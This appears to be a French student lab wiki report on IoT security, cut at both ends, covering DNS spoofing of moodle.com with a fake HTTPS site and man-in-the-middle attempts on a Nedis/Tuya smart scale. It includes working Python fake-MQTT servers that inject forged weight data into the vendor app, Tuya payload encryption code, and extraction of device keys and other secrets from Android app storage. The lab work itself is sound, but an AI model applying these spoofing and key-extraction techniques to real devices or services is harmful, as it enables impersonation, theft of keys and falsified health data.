Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que dès que la balance tente de se connecter elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisque qu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir un injecter le certificat dans la balance en communicant directement avec elle.

== Envoi de fausses informations vers l'application ==

Dans cette partie, nous allons tenter d'envoyer un poids à l'application depuis notre serveur.

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.

On tente donc d'envoyer en clair le poids vers l'application de Nedis<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
print(f"Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs situé dans /data/data/com.nedis.smartlife sur la VM android une clé local qui permettrai de chiffrer le message pour que Nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight>Je vais apprendre plus tard que cette clé est une clé qui permet de sécuriser l'échange Bluetooth entre la balance et le téléphone lors de la première connexion. Mais avant de le savoir, j'ai tenté d'améliorer le faux serveur avec cette clé.<syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
print(f"MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Je pense que pour faire fonctionner cette méthode, il faut absolument que je trouve la clé qui crypte le message pour que Nedis l'accepte quand il le reçoit

J'ai donc cherché dans cette direction et j'ai découvert deux choses.

Premièrement, TinyTuya, une API Python pour les appareils intelligents Tuya (génial, Nedis utilise Tuya) WiFi utilisant une connexion directe au réseau local (LAN) ou le cloud (API TuyaCloud). TinyTuya permet entre autre de récupérer la fameuse clé.

Ensuite, j'ai découvert la plateforme IOT de Tuya qui permet, en connectant son application de téléphone sur le site, de jouer avec ses appareils Tuya pour une connexion avec Home Assisant ou encore ... TinyTuya !

Spoiler alerte, j'ai la clé. Je parle plus de TinyTuya dans la prochaine partie car même avec cette clé, ce faux serveur ne marche pas. Je vais donc tenter d'autres pistes.

== TinyTuya ==
Dans cette partie, nous allons tenter de connecter notre balance à notre faux serveur en utilisant l'utilitaire TinyTuya. Le but est de récupérer le poids de l'utilisateur de la balance lorsqu'il se pèse.

Dans un premier temps il a fallu connecter l'appli à la platforme IOT de Tuya. L'application "Nedis Smartlife" de Nedis, qui utilise bien la même base que l'application Smartlife de Tuya (oui oui c'est le même nom…) ne veux pas se connecter à la plateforme pour une raison inexplicable (et au vu du nombre de forum qui parle du sujet, je ne suis pas le seul).

J'ai donc du connecter ma balance sur l'appli Smartlife qui a bien voulu se connecter à la plateforme.

Cela me permet de récupérer avec TinyTuya les périphériques

Et je vais maintenant tenter d'expliquer le fonctionnement de TinyTuya étape par étape…

Déjà pourquoi connecter l'application avec la plateforme IOT de Tuya --> Cela permet à l'appli de récupérer les appareils connectés de mon application, elle va générer un ID et une clé.

Et comment faire pour que TinyTuya est accès aux appareils --> grâce à la commande <code>python -m tinytuya wizard</code> qui va prendre l'ID et la clé pour récupérer les appareils.

Ensuite la commande suivante va permettre à TinyTuya de détecter nos appareils qui sont effectivement connecté à notre réseau :<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya devices TinyTuya
(Tuya device scanner) [1.17.4] Loaded devices.json - 1 devices: Device Listing [
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {} } ]
</syntaxhighlight>Et la, magie, on obtient la clé de la balance, on va pouvoir enfin récupérer le poids de notre utilisateur grâce à ce code python qui écoute la balance:<syntaxhighlight lang="python">
import tinytuya

DEVICE_ID = '84853100a4e57c162d4c'
IP_ADDRESS = '172.16.10.105'
LOCAL_KEY = 'V[z^Gr|qekh]9z_>'

# Connexion à l'appareil
d = tinytuya.Device(DEVICE_ID, IP_ADDRESS, LOCAL_KEY)

d.set_version(3.3)

# Récupérer le statut
data = d.status()
print("Statut complet :", data)
</syntaxhighlight>Évidemment cela ne fonctionne pas. Et pourquoi ? Et bien si l'on regarde dans le bloc <code>python3 -m tinytuya devices TinyTuya</code> on observe que le champs mapping est vide. Ce champs est censé afficher toute les données que TinyTuya est censé pouvoir récupérer … et il est vide …

Soit je suis à l'origine de ce problème, soit TinyTuya ne permet de changer nous ampoules connecté en rouge si la balance affiche que notre objectif de poids est dépassé …

Affaire à suivre.

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-18T13:37:25Z

Vdetrez : /* Envoi de fausses informations vers l'application */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
